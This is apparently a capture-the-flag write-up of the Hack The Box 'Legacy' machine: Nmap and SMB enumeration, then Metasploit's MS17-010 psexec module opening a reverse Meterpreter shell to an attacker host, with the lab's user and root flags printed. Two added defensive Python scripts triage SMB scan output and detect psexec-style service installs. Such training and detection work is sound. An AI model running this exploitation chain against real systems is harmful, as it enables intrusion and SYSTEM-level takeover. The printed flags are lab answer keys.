Legacy

Initial Enumeration

Nmap

┌──(kali㉿kali)-[~]
└─$ nmap -Pn -n 10.10.10.4                                  
Starting Nmap 7.94SVN ( <https://nmap.org> ) at 2024-10-20 20:41 EDT
Nmap scan report for 10.10.10.4
Host is up (0.16s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Nmap done: 1 IP address (1 host up) scanned in 18.17 seconds

┌──(kali㉿kali)-[~]
└─$ nmap -Pn -n 10.10.10.4 -p135,139,445 -sV -A 
Starting Nmap 7.94SVN ( <https://nmap.org> ) at 2024-10-20 20:42 EDT
Nmap scan report for 10.10.10.4
Host is up (0.16s latency).

PORT    STATE SERVICE      VERSION
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Windows XP microsoft-ds
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Host script results:
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 5d00h27m41s, deviation: 2h07m16s, median: 4d22h57m41s
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:94:3e:06 (VMware)
| smb-os-discovery: 
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: legacy
|   NetBIOS computer name: LEGACY\x00
|   Workgroup: HTB\x00
|_  System time: 2024-10-26T05:40:07+03:00
|_smb2-time: Protocol negotiation failed (SMB2)

Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 18.04 seconds

Our initial Nmap scan identifies 2 services exposed across three open ports: MSRPC on 135/tcp and SMB on 139/tcp (NetBIOS session service) and 445/tcp. The version and script scan adds that the host is Windows XP, that SMB message signing is disabled, and that SMB2 protocol negotiation fails.

SMB

Looking at the SMB service, we first check whether anonymous (null-session) login is allowed.

┌──(kali㉿kali)-[~]
└─$ smbclient -N -L 10.10.10.4
session setup failed: NT_STATUS_INVALID_PARAMETER
                                                                                                                                     
┌──(kali㉿kali)-[~]
└─$ smbclient -N -L 10.10.10.4 -m SMB1
WARNING: Ignoring invalid value 'SMB1' for parameter 'client max protocol'
session setup failed: NT_STATUS_INVALID_PARAMETER
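The indicators worth pulling out of the scan above all sit in Nmap's host-script block: the OS string, the message_signing line and the failed SMB2 negotiation. The script below is an added example for this writeup (not part of Nmap or of the original page) that parses that block in the layout Nmap prints it and turns the indicators into a severity list; SAMPLE_NMAP is a constructed copy of the page's own output, EOL_OS_MARKERS and the severities are my own choices. One caveat on the smbclient attempts: the -m/--max-protocol flag names the SMBv1 dialect NT1, which is why the second attempt warned that 'SMB1' is invalid and kept its default dialects.

```python
"""Triage Nmap's SMB host-script output for legacy-SMB risk indicators.
Added example for this writeup; not part of Nmap or the original page."""
import re

# Constructed copy of the host-script block from the scan shown above.
SAMPLE_NMAP = """\
Host script results:
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 5d00h27m41s, deviation: 2h07m16s, median: 4d22h57m41s
| smb-os-discovery: 
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: legacy
|   Workgroup: HTB
|_  System time: 2024-10-26T05:40:07+03:00
|_smb2-time: Protocol negotiation failed (SMB2)
"""

# OS families long out of extended support (assumption: extend with your own list).
EOL_OS_MARKERS = ("Windows XP", "Windows 2000", "Windows Server 2003")

# indent, key (up to the first colon), value
LINE = re.compile(r"^(\s*)([^:\s][^:]*?):\s*(.*)$")


def parse_host_scripts(text):
    """Return {script_name: {key: value}} from a 'Host script results' block.

    Nmap prints '| name: ' to open a multi-line script, '|   key: value' for
    its fields (the last one prefixed '|_'), and '|_name: message' for a
    script that produced a single line.
    """
    scripts, current = {}, None
    for line in text.splitlines():
        if not line.startswith("|"):
            continue
        m = LINE.match(line[2:])          # drop the '| ' / '|_' prefix
        if not m:
            continue
        indent, key, value = m.groups()
        if indent:                        # indented: a field of the open script
            if current is not None:
                scripts[current][key] = value
        elif value:                       # '|_name: message' one-line result
            scripts[key] = {"result": value}
            current = None
        else:                             # '| name:' opens a new script block
            current = key
            scripts[current] = {}
    return scripts


def assess_smb_exposure(scripts):
    """Map parsed script output to (severity, finding) pairs."""
    findings = []
    sec = scripts.get("smb-security-mode", {})
    if sec.get("message_signing", "").startswith("disabled"):
        findings.append(("high", "SMB signing disabled: sessions can be relayed or tampered with"))
    if sec.get("account_used") == "guest":
        findings.append(("medium", "guest account accepted for SMB script enumeration"))
    os_name = scripts.get("smb-os-discovery", {}).get("OS", "")
    if any(marker in os_name for marker in EOL_OS_MARKERS):
        findings.append(("critical", f"end-of-life OS reported: {os_name}"))
    if "negotiation failed" in scripts.get("smb2-time", {}).get("result", ""):
        findings.append(("high", "SMB2 negotiation failed: host speaks SMBv1 only"))
    return findings


if __name__ == "__main__":
    for severity, text in assess_smb_exposure(parse_host_scripts(SAMPLE_NMAP)):
        print(f"[{severity:8}] {text}")
```

The parser keys on indentation rather than script names, so it copes with values that themselves contain colons (the clock-skew and OS CPE lines) and with any other host script Nmap prints; only the assessment function needs to know which scripts matter.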

Initial Foothold

Both attempts to reach the SMB service anonymously failed. However, the service detection shows that SMB is served by an outdated Windows XP host (Windows 2000 LAN Manager), for which a public exploit should exist. We will search for one in Metasploit:

┌──(kali㉿kali)-[~]
└─$ msfconsole
Metasploit tip: You can pivot connections over sessions started with the 
ssh_login modules
                                                  
                                   ____________
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| $a,        |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| $S`?a,     |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%__%%%%%%%%%%|       `?a, |%%%%%%%%__%%%%%%%%%__%%__ %%%%]
 [% .--------..-----.|  |_ .---.-.|       .,a$%|.-----.|  |.-----.|__||  |_ %%]
 [% |        ||  -__||   _||  _  ||  ,,aS$""`  ||  _  ||  ||  _  ||  ||   _|%%]
 [% |__|__|__||_____||____||___._||%$P"`       ||   __||__||_____||__||____|%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| `"a,       ||__|%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%|____`"a,$$__|%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%        `"$   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]

       =[ metasploit v6.4.18-dev                          ]
+ -- --=[ 2437 exploits - 1255 auxiliary - 429 post       ]
+ -- --=[ 1471 payloads - 47 encoders - 11 nops           ]
+ -- --=[ 9 evasion                                       ]

Metasploit Documentation: <https://docs.metasploit.com/>

msf6 > search eternal

Matching Modules
================

   #   Name                                           Disclosure Date  Rank     Check  Description
   -   ----                                           ---------------  ----     -----  -----------
   0   exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1     \_ target: Automatic Target                  .                .        .      .
   2     \_ target: Windows 7                         .                .        .      .
   3     \_ target: Windows Embedded Standard 7       .                .        .      .
   4     \_ target: Windows Server 2008 R2            .                .        .      .
   5     \_ target: Windows 8                         .                .        .      .
   6     \_ target: Windows 8.1                       .                .        .      .
   7     \_ target: Windows Server 2012               .                .        .      .
   8     \_ target: Windows 10 Pro                    .                .        .      .
   9     \_ target: Windows 10 Enterprise Evaluation  .                .        .      .
   10  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   11    \_ target: Automatic                         .                .        .      .
   12    \_ target: PowerShell                        .                .        .      .
   13    \_ target: Native upload                     .                .        .      .
   14    \_ target: MOF upload                        .                .        .      .
   15    \_ AKA: ETERNALSYNERGY                       .                .        .      .
   16    \_ AKA: ETERNALROMANCE                       .                .        .      .
   17    \_ AKA: ETERNALCHAMPION                      .                .        .      .
   18    \_ AKA: ETERNALBLUE                          .                .        .      .
   19  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   20    \_ AKA: ETERNALSYNERGY                       .                .        .      .
   21    \_ AKA: ETERNALROMANCE                       .                .        .      .
   22    \_ AKA: ETERNALCHAMPION                      .                .        .      .
   23    \_ AKA: ETERNALBLUE                          .                .        .      .
   24  auxiliary/scanner/smb/smb_ms17_010             .                normal   No     MS17-010 SMB RCE Detection
   25    \_ AKA: DOUBLEPULSAR                         .                .        .      .
   26    \_ AKA: ETERNALBLUE                          .                .        .      .
   27  exploit/windows/smb/smb_doublepulsar_rce       2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution
   28    \_ target: Execute payload (x64)             .                .        .      .
   29    \_ target: Neutralize implant                .                .        .      .

Interact with a module by name or index. For example info 29, use 29 or use exploit/windows/smb/smb_doublepulsar_rce
After interacting with a module you can manually set a TARGET with set TARGET 'Neutralize implant'

msf6 > use 10
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_psexec) > options

Module options (exploit/windows/smb/ms17_010_psexec):

   Name                  Current Setting                     Required  Description
   ----                  ---------------                     --------  -----------
   DBGTRACE              false                               yes       Show extra debug trace info
   LEAKATTEMPTS          99                                  yes       How many times to try to leak transaction
   NAMEDPIPE                                                 no        A named pipe that can be connected to (leave blank for auto)
   NAMED_PIPES           /usr/share/metasploit-framework/da  yes       List of named pipes to check
                         ta/wordlists/named_pipes.txt
   RHOSTS                                                    yes       The target host(s), see <https://docs.metasploit.com/docs/usi>
                                                                       ng-metasploit/basics/using-metasploit.html
   RPORT                 445                                 yes       The Target port (TCP)
   SERVICE_DESCRIPTION                                       no        Service description to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                                      no        The service display name
   SERVICE_NAME                                              no        The service name
   SHARE                 ADMIN$                              yes       The share to connect to, can be an admin share (ADMIN$,C$,..
                                                                       .) or a normal read/write folder share
   SMBDomain             .                                   no        The Windows domain to use for authentication
   SMBPass                                                   no        The password for the specified username
   SMBUser                                                   no        The username to authenticate as

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.106.130  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

View the full module info with the info, or info -d command.

msf6 exploit(windows/smb/ms17_010_psexec) > set RHOSTS 10.10.10.4
RHOSTS => 10.10.10.4
msf6 exploit(windows/smb/ms17_010_psexec) > set LHOST 10.10.14.3
LHOST => 10.10.14.3
msf6 exploit(windows/smb/ms17_010_psexec) > run

[*] Started reverse TCP handler on 10.10.14.3:4444 
[*] 10.10.10.4:445 - Target OS: Windows 5.1
[*] 10.10.10.4:445 - Filling barrel with fish... done
[*] 10.10.10.4:445 - <---------------- | Entering Danger Zone | ---------------->
[*] 10.10.10.4:445 -    [*] Preparing dynamite...
[*] 10.10.10.4:445 -            [*] Trying stick 1 (x86)...Boom!
[*] 10.10.10.4:445 -    [+] Successfully Leaked Transaction!
[*] 10.10.10.4:445 -    [+] Successfully caught Fish-in-a-barrel
[*] 10.10.10.4:445 - <---------------- | Leaving Danger Zone | ---------------->
[*] 10.10.10.4:445 - Reading from CONNECTION struct at: 0x860201f0
[*] 10.10.10.4:445 - Built a write-what-where primitive...
[+] 10.10.10.4:445 - Overwrite complete... SYSTEM session obtained!
[*] 10.10.10.4:445 - Selecting native target
[*] 10.10.10.4:445 - Uploading payload... OZTTnpvm.exe
[*] 10.10.10.4:445 - Created \OZTTnpvm.exe...
[+] 10.10.10.4:445 - Service started successfully...
[*] Sending stage (176198 bytes) to 10.10.10.4
[*] 10.10.10.4:445 - Deleting \OZTTnpvm.exe...
[*] Meterpreter session 1 opened (10.10.14.3:4444 -> 10.10.10.4:1039) at 2024-10-20 21:12:28 -0400

meterpreter > 

From the Metasploit output we can see that this Windows XP host (reported as Windows 5.1) is vulnerable to MS17-010, the SMBv1 flaw behind EternalBlue and its sibling exploits. The ms17_010_psexec module uses it to obtain SYSTEM, uploads its payload as a service binary through the ADMIN$ share, starts the service, deletes the binary again, and leaves us with a Meterpreter session on the host.
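From the defender's side, what the module output above leaves on the host is a service installation whose binary is a random-named executable dropped into the Windows directory (the root of ADMIN$), started, and deleted seconds later. The script below is an added example, not part of the original writeup and not Metasploit's code: it runs that heuristic over a constructed, simplified event feed. The pipe-separated record layout, the timestamps, the service name hgYKsPzw and the file-monitor source are all made up for the example; 7045 and 7036 are the real Service Control Manager event IDs for "service was installed" and "service entered a state", and the binary name is the one the page shows.

```python
"""Flag the host-side trace of a psexec-style SMB payload: a service installed
with a random-named binary in the Windows directory, run, then deleted.
Added example for this writeup; not Metasploit's code and not a real log format."""
import re
from datetime import datetime, timedelta

# Constructed, simplified records: timestamp|source|event|key=value;key=value
# 7045 = SCM "service was installed", 7036 = SCM "service entered ... state".
# The service name, timestamps and the 'file-monitor' source are made up.
SAMPLE_EVENTS = """\
2024-10-20T21:12:20|Service Control Manager|7045|ServiceName=hgYKsPzw;ImagePath=C:\\WINDOWS\\OZTTnpvm.exe;StartType=demand start;Account=LocalSystem
2024-10-20T21:12:21|Service Control Manager|7036|ServiceName=hgYKsPzw;State=running
2024-10-20T21:12:27|file-monitor|delete|Path=C:\\WINDOWS\\OZTTnpvm.exe
2024-10-20T09:03:11|Service Control Manager|7045|ServiceName=VMTools;ImagePath=C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe;StartType=auto start;Account=LocalSystem
"""

RANDOM_EXE = re.compile(r"^[A-Za-z]{8}\.exe$")   # 8 letters, like OZTTnpvm.exe
WINDIR = "c:\\windows\\"                          # what ADMIN$ maps to


def parse_events(text):
    """Turn the pipe-separated sample records into dicts."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, source, event, fields = line.split("|", 3)
        record = {"ts": datetime.fromisoformat(ts), "source": source, "event": event}
        record.update(f.split("=", 1) for f in fields.split(";"))
        events.append(record)
    return events


def looks_random_name(filename):
    """Heuristic: 8 letters with mixed case, as generated payload names tend to be."""
    stem = filename[:-4]
    return bool(RANDOM_EXE.match(filename)) and stem != stem.lower() and stem != stem.upper()


def service_installs_to_review(events, window=timedelta(minutes=5)):
    """Return (service_name, image_path, reasons) for every 7045 that trips a heuristic."""
    deletions = [e for e in events if e["event"] == "delete"]
    findings = []
    for e in events:
        if e["event"] != "7045":
            continue
        image = e.get("ImagePath", "")
        norm = image.lower()
        reasons = []
        # Dropped straight into the Windows directory, i.e. the root of ADMIN$
        if norm.startswith(WINDIR) and norm.count("\\") == 2:
            reasons.append("service binary placed directly in the Windows directory (ADMIN$ root)")
        if looks_random_name(image.rsplit("\\", 1)[-1]):
            reasons.append("random-looking 8-letter mixed-case executable name")
        # Install, run and delete within a short window is the psexec-style signature
        for d in deletions:
            gap = d["ts"] - e["ts"]
            if d.get("Path", "").lower() == norm and timedelta(0) <= gap <= window:
                reasons.append(f"binary deleted {int(gap.total_seconds())}s after the service was installed")
        if reasons:
            findings.append((e["ServiceName"], image, reasons))
    return findings


if __name__ == "__main__":
    for name, image, reasons in service_installs_to_review(parse_events(SAMPLE_EVENTS)):
        print(f"review service {name!r} ({image}):")
        for r in reasons:
            print("  -", r)
```

Each reason on its own is weak (legitimate installers also register services, and vmtoolsd.exe in the sample is an 8-letter name that is deliberately not flagged), so treat a single hit as triage input; the combination of all three, as for the OZTTnpvm.exe record, is what deserves an immediate look.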

meterpreter > shell
Process 252 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>whoami
whoami
'whoami' is not recognized as an internal or external command,
operable program or batch file.

C:\WINDOWS\system32>cd C:\
cd C:\

C:\>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 54BF-723B

 Directory of C:\

16/03/2017  08:30                    0 AUTOEXEC.BAT
16/03/2017  08:30                    0 CONFIG.SYS
16/03/2017  09:07       <DIR>          Documents and Settings
29/12/2017  11:41       <DIR>          Program Files
26/10/2024  06:10       <DIR>          WINDOWS
               2 File(s)              0 bytes
               3 Dir(s)   6.342.569.984 bytes free

C:\>cd Documents and Settings

C:\Documents and Settings>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 54BF-723B

 Directory of C:\Documents and Settings

16/03/2017  09:07       <DIR>          .
16/03/2017  09:07       <DIR>          ..
16/03/2017  09:07       <DIR>          Administrator
16/03/2017  08:29       <DIR>          All Users
16/03/2017  08:33       <DIR>          john
               0 File(s)              0 bytes
               5 Dir(s)   6.342.557.696 bytes free

C:\Documents and Settings>cd john
cd john

C:\Documents and Settings\john> dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 54BF-723B

 Directory of C:\Documents and Settings\john

16/03/2017  08:33       <DIR>          .
16/03/2017  08:33       <DIR>          ..
16/03/2017  09:19       <DIR>          Desktop
16/03/2017  08:33       <DIR>          Favorites
16/03/2017  08:33       <DIR>          My Documents
16/03/2017  08:20       <DIR>          Start Menu
               0 File(s)              0 bytes
               6 Dir(s)   6.342.553.600 bytes free

C:\Documents and Settings\john>cd Desktop
cd Desktop

C:\Documents and Settings\john\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 54BF-723B

 Directory of C:\Documents and Settings\john\Desktop

16/03/2017  09:19       <DIR>          .
16/03/2017  09:19       <DIR>          ..
16/03/2017  09:19                   32 user.txt
               1 File(s)             32 bytes
               2 Dir(s)   6.342.553.600 bytes free

C:\Documents and Settings\john\Desktop>type user.txt
type user.txt
e69af0e4f443de7e36876fda4ec7644f

C:\Documents and Settings\john\Desktop>cd ..
cd ..

C:\Documents and Settings\john> cd ..
cd ..

C:\Documents and Settings>cd Administrator
cd Administrator

C:\Documents and Settings\Administrator>cd Desktop
cd Desktop

C:\Documents and Settings\Administrator\Desktop>type root.txt
type root.txt
993442d258b0e0ec917cae9e695d5713

e69af0e4f443de7e36876fda4ec7644f

993442d258b0e0ec917cae9e695d5713
